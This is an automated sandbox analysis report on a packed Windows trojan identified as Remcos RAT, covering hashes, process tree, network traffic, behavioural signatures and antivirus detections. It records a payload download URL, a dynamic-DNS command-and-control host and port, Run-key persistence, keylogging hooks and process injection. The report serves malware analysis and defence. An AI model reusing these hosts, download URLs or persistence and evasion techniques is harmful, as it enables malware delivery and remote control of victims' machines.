Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Sept. 2, 2021, 9:14 a.m.	Sept. 2, 2021, 9:32 a.m.

Size	444.0KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`36909bb88f91e69d271e206ab3fa8f00`
SHA256	`75591cb23ef20e0a1bc8d01a392621d608b83ee25bcf37b330d3e966d2c8a50b`
CRC32	`037AC3BF`
ssdeep	`6144:swnXSYbm2at3ZjyPt7Z3CZzw+38Pt7cjqJWa:bSwatJuP5N8H8P5cEWa`
Yara	PE_Header_Zero - PE File Signature Generic_Malware_Zero - Generic Malware UPX_Zero - UPX packed file IsPE32 - (no description)

XNO.exe "C:\Users\test22\AppData\Local\Temp\XNO.exe"
2460
- XNO.exe "C:\Users\test22\AppData\Local\Temp\XNO.exe"
  684
  - cmd.exe cmd /c ""C:\Users\test22\AppData\Local\Temp\install.bat" "
    508
    - PING.EXE PING 127.0.0.1 -n 2
      1776
    - win.exe "C:\Users\test22\AppData\Roaming\win.exe"
      1632
      - win.exe "C:\Users\test22\AppData\Roaming\win.exe"
        2988

Name	Response	Post-Analysis Lookup
xp19.ddns.net	A 103.133.111.221	103.133.111.221

IP Address	Status	Action
103.133.111.149	Active	Moloch
103.133.111.221	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.102:52062 -> 164.124.101.2:53	2028675	ET POLICY DNS Query to DynDNS Domain *.ddns .net	Potentially Bad Traffic
TCP 192.168.56.102:49173 -> 103.133.111.149:80	2018752	ET MALWARE Generic .bin download from Dotted Quad	A Network Trojan was detected
TCP 192.168.56.102:49166 -> 103.133.111.149:80	2018752	ET MALWARE Generic .bin download from Dotted Quad	A Network Trojan was detected
TCP 192.168.56.102:49174 -> 103.133.111.221:1996	2025637	ET MALWARE Remcos RAT Checkin 23	Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Command line console output was observed (22 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 2, 2021, 9:31 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2021, 9:31 a.m.	buffer: PING console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2021, 9:31 a.m.	buffer: 127.0.0.1 -n 2 console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2021, 9:31 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2021, 9:31 a.m.	buffer: start console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2021, 9:31 a.m.	buffer: "" "C:\Users\test22\AppData\Roaming\win.exe" console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2021, 9:31 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2021, 9:31 a.m.	buffer: del console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2021, 9:31 a.m.	buffer: "C:\Users\test22\AppData\Local\Temp\install.bat" console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2021, 9:31 a.m.	buffer: The batch file cannot be found. console_handle: 0x0000000b	1	1
WriteConsoleA Sept. 2, 2021, 9:31 a.m.	buffer: Pinging 127.0.0.1 console_handle: 0x00000007	1	1
WriteConsoleA Sept. 2, 2021, 9:31 a.m.	buffer: with 32 bytes of data: console_handle: 0x00000007	1	1
WriteConsoleA Sept. 2, 2021, 9:31 a.m.	buffer: Reply from 127.0.0.1: console_handle: 0x00000007	1	1
WriteConsoleA Sept. 2, 2021, 9:31 a.m.	buffer: bytes=32 console_handle: 0x00000007	1	1
WriteConsoleA Sept. 2, 2021, 9:31 a.m.	buffer: time<1ms console_handle: 0x00000007	1	1
WriteConsoleA Sept. 2, 2021, 9:31 a.m.	buffer: TTL=128 console_handle: 0x00000007	1	1
WriteConsoleA Sept. 2, 2021, 9:31 a.m.	buffer: Reply from 127.0.0.1: console_handle: 0x00000007	1	1
WriteConsoleA Sept. 2, 2021, 9:31 a.m.	buffer: bytes=32 console_handle: 0x00000007	1	1
WriteConsoleA Sept. 2, 2021, 9:31 a.m.	buffer: time<1ms console_handle: 0x00000007	1	1
WriteConsoleA Sept. 2, 2021, 9:31 a.m.	buffer: TTL=128 console_handle: 0x00000007	1	1
WriteConsoleA Sept. 2, 2021, 9:31 a.m.	buffer: Ping statistics for 127.0.0.1: Packets: Sent = 2, Received = 2, Lost = 0 (0% loss), console_handle: 0x00000007	1	1
WriteConsoleA Sept. 2, 2021, 9:31 a.m.	buffer: Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms console_handle: 0x00000007	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 2, 2021, 9:14 a.m.		1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

Connection to IP address

suspicious_request

GET http://103.133.111.149/XP-remcos_mXwRejN225.bin

Connects to a Dynamic DNS Domain (1 event)

domain

xp19.ddns.net

Performs some HTTP requests (1 event)

request

GET http://103.133.111.149/XP-remcos_mXwRejN225.bin

Allocates read-write-execute memory (usually to unpack itself) (9 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Sept. 2, 2021, 9:14 a.m.	process_identifier: 2460 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f92000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2021, 9:14 a.m.	process_identifier: 2460 region_size: 73728 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 2, 2021, 9:15 a.m.	process_identifier: 2460 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 876544 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x77af0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 2, 2021, 9:31 a.m.	process_identifier: 684 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 876544 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x77af0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 2, 2021, 9:31 a.m.	process_identifier: 1632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74b72000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 2, 2021, 9:31 a.m.	process_identifier: 1632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73473000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 2, 2021, 9:31 a.m.	process_identifier: 1632 region_size: 73728 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02770000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 2, 2021, 9:31 a.m.	process_identifier: 1632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 876544 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x77af0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 2, 2021, 9:31 a.m.	process_identifier: 2988 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 876544 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x77af0000 process_handle: 0xffffffff	1

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\install.bat

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Sept. 2, 2021, 9:31 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\install.bat parameters: filepath: C:\Users\test22\AppData\Local\Temp\install.bat	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Sept. 2, 2021, 9:14 a.m.	process_identifier: 2460 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 24576 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x004e0000 process_handle: 0xffffffff	1	0	0

Yara rule detected in process memory (31 events)

description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Steal credential	rule	local_credential_Steal
description	File Downloader	rule	Network_Downloader
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vba
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

PING 127.0.0.1 -n 2

Communicates with host for which no DNS query was performed (1 event)

host

103.133.111.149

Enumerates services, possibly for anti-virtualization (1 event)

Time & API	Arguments	Status	Return	Repeated
EnumServicesStatusA Sept. 2, 2021, 9:15 a.m.	service_handle: 0x00624210 service_type: 48 service_status: 3		0	0

Installs itself for autorun at Windows startup (2 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\vlc				reg_value	"C:\Users\test22\AppData\Roaming\win.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\vlc				reg_value	"C:\Users\test22\AppData\Roaming\win.exe"

Creates a windows hook that monitors keyboard input (keylogger) (1 event)

Time & API	Arguments	Status	Return	Repeated
SetWindowsHookExA Sept. 2, 2021, 9:31 a.m.	thread_identifier: 0 callback_function: 0x0040385c hook_identifier: 13 (WH_KEYBOARD_LL) module_address: 0x00400000	1	2425145	0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 508 resumed a thread in remote process 1632
NtResumeThread Sept. 2, 2021, 9:31 a.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 1632	1	0	0

File has been identified by 36 AntiVirus engines on VirusTotal as malicious (36 events)

Elastic	malicious (high confidence)
MicroWorld-eScan	Gen:Variant.Razy.916543
McAfee	RDN/Generic.grp
Cylance	Unsafe
Alibaba	Trojan:Win32/GenKryptik.e42893df
Cybereason	malicious.640f12
Cyren	W32/VBKrypt.AZO.gen!Eldorado
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of Win32/GenKryptik.FJTP
APEX	Malicious
Paloalto	generic.ml
Kaspersky	UDS:DangerousObject.Multi.Generic
BitDefender	Gen:Variant.Razy.916543
Avast	FileRepMalware
Ad-Aware	Gen:Variant.Razy.916543
Sophos	Mal/Generic-S
McAfee-GW-Edition	BehavesLike.Win32.Worm.gm
FireEye	Gen:Variant.Razy.916543
Emsisoft	Gen:Variant.Razy.916543 (B)
SentinelOne	Static AI - Suspicious PE
Webroot	W32.Worm.gm
MAX	malware (ai score=83)
Kingsoft	Win32.Troj.Generic_a.a.(kcloud)
Microsoft	Trojan:Win32/Sabsik.FL.B!ml
GData	Gen:Variant.Razy.916543
Cynet	Malicious (score: 100)
ALYac	Gen:Variant.Razy.916543
Malwarebytes	Malware.AI.4129293227
Ikarus	Win32.Outbreak
eGambit	Unsafe.AI_Score_99%
Fortinet	W32/Agent.FCI!tr
BitDefenderTheta	Gen:NN.ZevbaF.34126.Bm0@aqeH!UeG
AVG	FileRepMalware
Panda	Trj/GdSda.A
CrowdStrike	win/malicious_confidence_90% (W)
MaxSecure	Trojan.Malware.300983.susgen

XNO.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All